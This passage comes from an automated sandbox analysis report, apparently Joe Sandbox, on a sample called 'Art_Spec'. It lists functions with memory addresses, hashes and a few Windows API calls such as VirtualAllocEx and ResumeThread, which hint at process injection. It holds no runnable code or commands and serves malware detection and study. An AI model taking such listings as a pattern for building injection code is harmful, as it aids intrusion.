                                                        • Opcode Fuzzy Hash: 144134e3ca09d5fd066bbd03b6b714d6451d55b187a0d7ee12bf11d6389c2919
                                                        • Instruction Fuzzy Hash: 191167718002499FDB10DFAAC844BEFBBF5EF48320F24842EE515A7251C775A900CFA1
                                                        Function 047C19B8 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: f0c534a5c948869ee54afd2a9094639e9d57a101c5dd8eef3c1568a61e4a65d1
                                                        • Instruction ID: 9df139f3f9a5fedc058ad79afdb65504a9aba053c7a40f2eed2d1a7f5306ab09
                                                        • Opcode Fuzzy Hash: f0c534a5c948869ee54afd2a9094639e9d57a101c5dd8eef3c1568a61e4a65d1
                                                        • Instruction Fuzzy Hash: 331167B1C002498FDB20DFAAD4447AEBBF5EB88324F64842DD559A7340DA74A901CFA4
                                                        Function 00A7A168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7B079,00000800,00000000,00000000), ref: 00A7B28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4812f94ae320ae614d711c477a896c4e95bcd965e8c8eb9db2728189105ba82f
                                                        • Instruction ID: 5eeca473c667a71bf0740f3488ac9490ba4c839134e7acb787c02c7a0a1e9efc
                                                        • Opcode Fuzzy Hash: 4812f94ae320ae614d711c477a896c4e95bcd965e8c8eb9db2728189105ba82f
                                                        • Instruction Fuzzy Hash: 861103B69003099FDB10CF9AD844BDEFBF4EB48710F14842AE519A7210D375A945CFA5
                                                        Function 047C1B48 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 047C1BB6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 26eb9eb3c0704c554077c9eb3543a237e3fe2955d365d7812fc730d836ef682c
                                                        • Instruction ID: c4f12a85b9b62fdacc074b065c8d3fccaa83f291524dea82e76b95acff684179
                                                        • Opcode Fuzzy Hash: 26eb9eb3c0704c554077c9eb3543a237e3fe2955d365d7812fc730d836ef682c
                                                        • Instruction Fuzzy Hash: 251137719003499FDB10DFAAD844BDFBBF5EF88310F24881AE519A7250D775A950CFA1
                                                        Function 00A7B21C Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7B079,00000800,00000000,00000000), ref: 00A7B28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c02cab4c59b9b23f7809a2f88642dcae023e98918abde94dca1d34f5c9c1ec7
                                                        • Instruction ID: 4d9bdbf74e1c476fa93cd9862e635c3743ebc487283b2813f3625f7251258346
                                                        • Opcode Fuzzy Hash: 8c02cab4c59b9b23f7809a2f88642dcae023e98918abde94dca1d34f5c9c1ec7
                                                        • Instruction Fuzzy Hash: 4E1112B69002498FDB10CFAAD844BDEFBF4AB88310F14842AD959A7210C375A945CFA5
                                                        Function 047C4AF0 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 047C4B55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 6632542825944109b78ff0860dd6fd1c5db01b1b9ccd6b6d0fea7213cf7f5e97
                                                        • Instruction ID: dad62de8ed9992b39324bf6a798bd91732bbcbab08c7ae12d799b89bf1557f6b
                                                        • Opcode Fuzzy Hash: 6632542825944109b78ff0860dd6fd1c5db01b1b9ccd6b6d0fea7213cf7f5e97
                                                        • Instruction Fuzzy Hash: F71132B5C002499FDB10CF99D885BDEBBF4FB48310F20845AD528A7641D374AA44CFA1
                                                        Function 00A7AF95 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7AFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: a118f9ae01bdc342c944f5a827797bab04fdba6d59f36f099261f1e9aa2640e2
                                                        • Instruction ID: 732bc042b9b05475ff4ff03b0d96e8a741763e153b52bf47f986a05aea9ad115
                                                        • Opcode Fuzzy Hash: a118f9ae01bdc342c944f5a827797bab04fdba6d59f36f099261f1e9aa2640e2
                                                        • Instruction Fuzzy Hash: CD110FB6C006499FDB10CF9AD844BDEFBF4EB88314F14C45AD529A7210D379A546CFA1
                                                        Function 00A7AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7AFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 0a7ce9c97552f681e32fe7651032ccb33e4f8752bd2bd32ac34d3d98ffbf46cf
                                                        • Instruction ID: dcbcbc16ffd85dbef95a7c232c4dc743470b65af5b4e7acde7c1919f7b36658e
                                                        • Opcode Fuzzy Hash: 0a7ce9c97552f681e32fe7651032ccb33e4f8752bd2bd32ac34d3d98ffbf46cf
                                                        • Instruction Fuzzy Hash: 93110FB5C006498FDB10CF9AD844B9EFBF4AB88314F10C41AD429A7210D379A545CFA1
                                                        Function 047C2C7C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 047C4B55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: e994a9cfe1892587197170673a70af34cfa88138c871edce1331f02eb0fc98d7
                                                        • Instruction ID: 24df8705c6165e9006e658d3a30bd918e2773e0abd73ee9f23fd2decd81a4800
                                                        • Opcode Fuzzy Hash: e994a9cfe1892587197170673a70af34cfa88138c871edce1331f02eb0fc98d7
                                                        • Instruction Fuzzy Hash: 6711F2B59007499FDB10DF9AD888BDEBBF8EB48310F10845EE528A7700D375A944CFA5
                                                        Function 047C19C0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3ae2e85322c66f2af77f58249757780f9d7d493402611ac9dbb007446d026d4f
                                                        • Instruction ID: d92be83c1d857f7d69f17c8f55bae839266ce37b49e44871b7457046554ae6a1
                                                        • Opcode Fuzzy Hash: 3ae2e85322c66f2af77f58249757780f9d7d493402611ac9dbb007446d026d4f
                                                        • Instruction Fuzzy Hash: C10108B08007498FDB24DFAAC4457AFBBF4EB48714F24841DD519A7240C778A544CFA5
                                                        Function 0530B358 Relevance: .2, Instructions: 181COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed1329cd2bcbd5eabc1685d867e83b161558dab4fb65fbe831a03b903af5fc06
                                                        • Instruction ID: a0c58633cf64eb3d2cae1b3045d37bb188667d6b4ce66807c9b7e1c51570e933
                                                        • Opcode Fuzzy Hash: ed1329cd2bcbd5eabc1685d867e83b161558dab4fb65fbe831a03b903af5fc06
                                                        • Instruction Fuzzy Hash: DB71B374E04218CFDB48CFE9C8A4AADFBB6FF89300F20906AD519AB355DB745945CB50
                                                        Function 05303B04 Relevance: .2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b297a41d05f07ed86f7f6bccdd0ba2a8bb23290e91e6c5f8a180227b360927bc
                                                        • Instruction ID: 3ec24e9379e44d1bc2d61385989e349b19879646a110ff1672d3acf16655c104
                                                        • Opcode Fuzzy Hash: b297a41d05f07ed86f7f6bccdd0ba2a8bb23290e91e6c5f8a180227b360927bc
                                                        • Instruction Fuzzy Hash: 9D51BD71B002058FDB14EBB998589BFBBF6EFC43207248929E419D7395EB309C0587A0
                                                        Function 0530BB70 Relevance: .1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d0fcf4643c5d313c6d41e6635b51b87f8706021ddc8e267bd0968b77157eba8d
                                                        • Instruction ID: b7700ca0c603a66a519b0c69805b13a1bd70ecfd2b97faca1465ccce829cd329
                                                        • Opcode Fuzzy Hash: d0fcf4643c5d313c6d41e6635b51b87f8706021ddc8e267bd0968b77157eba8d
                                                        • Instruction Fuzzy Hash: 27413F74E082089BDB08CFAAD4646EEFBFBEF89311F14E025D419A3295DB345941CF54
                                                        Function 053072D4 Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 505d966498556ac22befc0d56bd9b997c7c32e399d0bef322b982cdaeef961d3
                                                        • Instruction ID: 522761ac4d1ca4854fde54028612ef5e4191bc0d01689fef05fa530108f5bb50
                                                        • Opcode Fuzzy Hash: 505d966498556ac22befc0d56bd9b997c7c32e399d0bef322b982cdaeef961d3
                                                        • Instruction Fuzzy Hash: 6C315971900308AFDF10DFA9D848A9EBFF9EF48310F10852AE509A7350D775A944CBA4
                                                        Function 0530729C Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82d338a9be010ac86cb451c0588b9e9a042bb657e3e85e04563d970a0df548d3
                                                        • Instruction ID: 60d3c1a0080b71718f7421ccf4550fc2236d7dfbd2bbd522cd765e7f10f10211
                                                        • Opcode Fuzzy Hash: 82d338a9be010ac86cb451c0588b9e9a042bb657e3e85e04563d970a0df548d3
                                                        • Instruction Fuzzy Hash: FC21F66170031587DB196BBD457877F628BEBC4260724553DEA0BDB3C5ED24DC0283AA
                                                        Function 009CD3D8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9939b4a5ad6d6c5270a2106fc6cb1e3c9d945264de2f535270728a7a7ace623
                                                        • Instruction ID: 356c83bdb24faa5ae4954d5ec58c882630a3c8ceaa416229a9266055cc158ea8
                                                        • Opcode Fuzzy Hash: e9939b4a5ad6d6c5270a2106fc6cb1e3c9d945264de2f535270728a7a7ace623
                                                        • Instruction Fuzzy Hash: 6C212B71900204DFDB08DF14D9C0F16BF65FB94314F24C57DEA090B2A6C33AE856CAA2
                                                        Function 009CD4C4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22342ce28349c304e8e1952c413457ad8c861035a1cd02eccbc6120923b821c6
                                                        • Instruction ID: cf8c07939526555cf01d0a46fe7c9f53bc82ecbcb6a12f7dc265941fac643fc7
                                                        • Opcode Fuzzy Hash: 22342ce28349c304e8e1952c413457ad8c861035a1cd02eccbc6120923b821c6
                                                        • Instruction Fuzzy Hash: E621F572905284DFDB05DF14D9C0F26BF65FB88318F24C57DE9090B25AC33AD856CAA2
                                                        Function 0530726C Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 924129fe7fac7579ba1a3b16c6d6809a14de5a7256a63c256491a0fe50f79705
                                                        • Instruction ID: 8febddf0788aa73ab3ca7f7fe5415d1babacbd21bf7c8308f6b67b9c96ee4b6c
                                                        • Opcode Fuzzy Hash: 924129fe7fac7579ba1a3b16c6d6809a14de5a7256a63c256491a0fe50f79705
                                                        • Instruction Fuzzy Hash: BC11B67470D384AFD706DBB48DA956D7BB9DF42200B1484EEE845C7293E931DD068361
                                                        Function 05306FEA Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2341cb77663ddc6ad53d3b626c2d5667461eb1afaf3b81b23aa6a3715da55de
                                                        • Instruction ID: d708f6fe6467c7cc5e3b308f0befc1b483cee42e1da02e0428d4d400cb79c4fa
                                                        • Opcode Fuzzy Hash: e2341cb77663ddc6ad53d3b626c2d5667461eb1afaf3b81b23aa6a3715da55de
                                                        • Instruction Fuzzy Hash: B921D4726043189FE714CF6AC495BABBBF5FB893A4F148169F418CB294C6714905C7E0
                                                        Function 009DD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118381887.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9dd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d0fd4b1a80b789e977d298d12130adff1af05404f31db2e1e5dd5e477967067f
                                                        • Instruction ID: 3a90562a1fae6ca0adda5e37f9a36c12a3ce4290c630fcac814e9651fd6a74b5
                                                        • Opcode Fuzzy Hash: d0fd4b1a80b789e977d298d12130adff1af05404f31db2e1e5dd5e477967067f
                                                        • Instruction Fuzzy Hash: 2E210475644204DFDB14DF24D9C0B26BB65FBC8314F24C9AEE90A4B386C37AD847CA61
                                                        Function 009DD1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118381887.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9dd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f22fa94aed3e757bff9e1a5edde205113390898b5aacb6994cf44768b2fd4d1
                                                        • Instruction ID: ee2622306b01cda3760fc5d1a0d507d1f3cf7c90fd2769e4ad34345cee6dae0f
                                                        • Opcode Fuzzy Hash: 5f22fa94aed3e757bff9e1a5edde205113390898b5aacb6994cf44768b2fd4d1
                                                        • Instruction Fuzzy Hash: A4214971544204EFDB04DF14D9C0F25BB65FB84314F24C9AEEA094B342C33AD806CB61
                                                        Function 05306B92 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68de25d16b58a832c67d4d7ce66bc892cfbb82f1118fbb045a1ce3fabf1bb448
                                                        • Instruction ID: 9f0aa5e58c42da11c8d852f15fc62edbacccec1a7b7470eb4b1710c1a1da9e39
                                                        • Opcode Fuzzy Hash: 68de25d16b58a832c67d4d7ce66bc892cfbb82f1118fbb045a1ce3fabf1bb448
                                                        • Instruction Fuzzy Hash: 5321E0B0C00318DFEB20DF99C599B8EBBF4FB48724F249029E409BB690C7B55845CBA5
                                                        Function 05303CA4 Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f02640bb7ef90a77b9eddf735c2c79651c418c658f4d8df0f0d0d04e663f4999
                                                        • Instruction ID: 09bbcc63ed99e8e65e932a46ec76750d2bb2a62d39a36f6c97cd2ccb0083eef2
                                                        • Opcode Fuzzy Hash: f02640bb7ef90a77b9eddf735c2c79651c418c658f4d8df0f0d0d04e663f4999
                                                        • Instruction Fuzzy Hash: E931E0B0D00318DFEB20DF99C599B9EBBF5FB48714F249059E409BB290C7B56845CBA4
                                                        Function 053069D8 Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ab2d0817331555d54ba957a52ca66d5162b09b83031a0b369e7c7c8dec4b477
                                                        • Instruction ID: 9585d0cba325f6ca95d21e565ad0b9eaf5edee801d1b89289028a915ef693135
                                                        • Opcode Fuzzy Hash: 1ab2d0817331555d54ba957a52ca66d5162b09b83031a0b369e7c7c8dec4b477
                                                        • Instruction Fuzzy Hash: FD11E0B6B003155F9B11EF7998649BFB7BBFBC42207248929E458D3384EF309D0687A0
                                                        Function 009DD005 Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118381887.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9dd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bacf44128ed6820ae2609b61c74078f2a4bb08650ec92978bdbff88ed5c7e0e4
                                                        • Instruction ID: 452923ef5f5f7f7c56b8a3bb58b3d5b9271491127b28caf9f90fec1c1dc22377
                                                        • Opcode Fuzzy Hash: bacf44128ed6820ae2609b61c74078f2a4bb08650ec92978bdbff88ed5c7e0e4
                                                        • Instruction Fuzzy Hash: D421A4755493C48FCB12CF24D990715BF71EB85314F28C5DBD8498B697C33A980ACB62
                                                        Function 05306908 Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 021cccd2bf7e1aea93ec302a7955d99368ba43726eb0a0316621cf06ef6c9bb4
                                                        • Instruction ID: 4e83dd10ac3a2a8880a9247797edb28d3c9bafce9a99e9c59b7328b5525cb1b9
                                                        • Opcode Fuzzy Hash: 021cccd2bf7e1aea93ec302a7955d99368ba43726eb0a0316621cf06ef6c9bb4
                                                        • Instruction Fuzzy Hash: 1B111C31B00219CBCB54EBA999216FEB7B6AF88310B10506DC505EB384EB728D11CBA1
                                                        Function 009CD3D3 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                        • Instruction ID: 30c513b1997503c52012186324fea3400fb56b529146a3f96395ca73b62c0eeb
                                                        • Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                        • Instruction Fuzzy Hash: 2E110672804240DFCB05CF00D5C0B16BF71FB94314F24C2ADD9090B266C33AE456CB92
                                                        Function 009CD4BF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                        • Instruction ID: 1bd309a11378aea182b073a9f5acd8e70b663991ea955c4f929f408ff5cc8335
                                                        • Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                        • Instruction Fuzzy Hash: B311D376904284CFCB15CF14D9C4B16BF71FB94314F24C6ADE8490B65AC33AD95ACBA2
                                                        Function 053072E4 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a8a6e10cb5fcc05d8f6f095d157469ec99e96dd89e8cf2c0f08afeec15e6667
                                                        • Instruction ID: 5564507a992ec87e0cb15a652865663c7b49ee58d4045fc0c7981e316202f56d
                                                        • Opcode Fuzzy Hash: 9a8a6e10cb5fcc05d8f6f095d157469ec99e96dd89e8cf2c0f08afeec15e6667
                                                        • Instruction Fuzzy Hash: 3721FFB5900749DFDB10DF9AD884ADEBBF8FB48310F10852AE919A7250C374A954CFA5
                                                        Function 009DD1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118381887.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9dd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c21f20f9b933fcfff6280cc061701e95e78f5f46405777b46ba0931fd6c09a03
                                                        • Instruction ID: 09100e1b26e4809b5224c23f30425bb4d1034c21ff51367f3f31265808738eec
                                                        • Opcode Fuzzy Hash: c21f20f9b933fcfff6280cc061701e95e78f5f46405777b46ba0931fd6c09a03
                                                        • Instruction Fuzzy Hash: 4911BB75544284DFDB01CF10C5C0B15BBB1FB84314F24C6AAD9494B796C33AD80ACB61
                                                        Function 0530854E Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b130e3d58872948975b9706db5c56eae52d8e5a560e885ab8fb1fb8a35e8730
                                                        • Instruction ID: 7389df307d9a3946bb93eb151c2cbf8c1726e8cf15b69728482fa8dec96d4793
                                                        • Opcode Fuzzy Hash: 3b130e3d58872948975b9706db5c56eae52d8e5a560e885ab8fb1fb8a35e8730
                                                        • Instruction Fuzzy Hash: 9801F4313043845BEB266A698C78A3FABAEDFC5160B04147AED06C72C2EE14DC4682B5
                                                        Function 0530BD98 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
